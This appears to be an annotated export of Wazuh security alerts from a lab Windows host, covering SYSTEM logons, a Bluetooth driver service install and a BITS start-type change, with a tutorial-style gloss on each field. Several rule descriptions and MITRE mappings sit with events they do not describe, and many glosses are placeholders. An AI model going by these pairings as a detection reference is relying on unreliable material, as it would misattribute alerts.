id: 1745533904.252603 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:40:39.5684739Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43523 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 8104 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533904.259939 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:40:40.9799561Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43525 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 14292 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: New Windows Service Created Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 61138 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1543.003'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Persistence', 'Privilege Escalation'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Windows Service'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_system'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533908.267277 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Service Control Manager No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {555908d1-a6d7-4695-8e1e-26931d2012f4} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Service Control Manager No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 7045 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8080000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:31:16.4230414Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2969 Incremental log record number – handy for timeline order.
data.win.system.processID: 772 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 3052 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "A service was installed in the system.
Service Name: Bluetooth Device (Personal Area Network)
Service File Name: \SystemRoot\System32\drivers\bthpan.sys
Service Type: kernel mode driver
Service Start Type: demand start
Service Account: " No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.serviceName: Bluetooth Device (Personal Area Network) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.imagePath: \\SystemRoot\\System32\\drivers\\bthpan.sys No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.serviceType: kernel mode driver No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.startType: demand start No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Service startup type was changed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 61104 Numeric ID of the detection rule that fired.
rule.info: This does not appear to be logged on Windows 2000 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.firedtimes: 9 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_system', 'policy_changed'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6'] PCI DSS mapping – card‑holder data rules.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6'] NIST 800‑53 mapping – US Fed controls.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533908.269386 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Service Control Manager No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {555908d1-a6d7-4695-8e1e-26931d2012f4} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Service Control Manager No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 7040 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8080000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:31:20.5278944Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2970 Incremental log record number – handy for timeline order.
data.win.system.processID: 772 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 3052 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "The start type of the Background Intelligent Transfer Service service was changed from demand start to auto start." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param1: Background Intelligent Transfer Service No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param2: demand start No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param3: auto start No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param4: BITS No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533914.271196 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:41:18.2062622Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43568 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 9432 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533914.278532 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:42:38.4198684Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43571 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 14292 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Windows command prompt started by an abnormal process Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92052 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.003'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Windows Command Shell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533920.285870 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
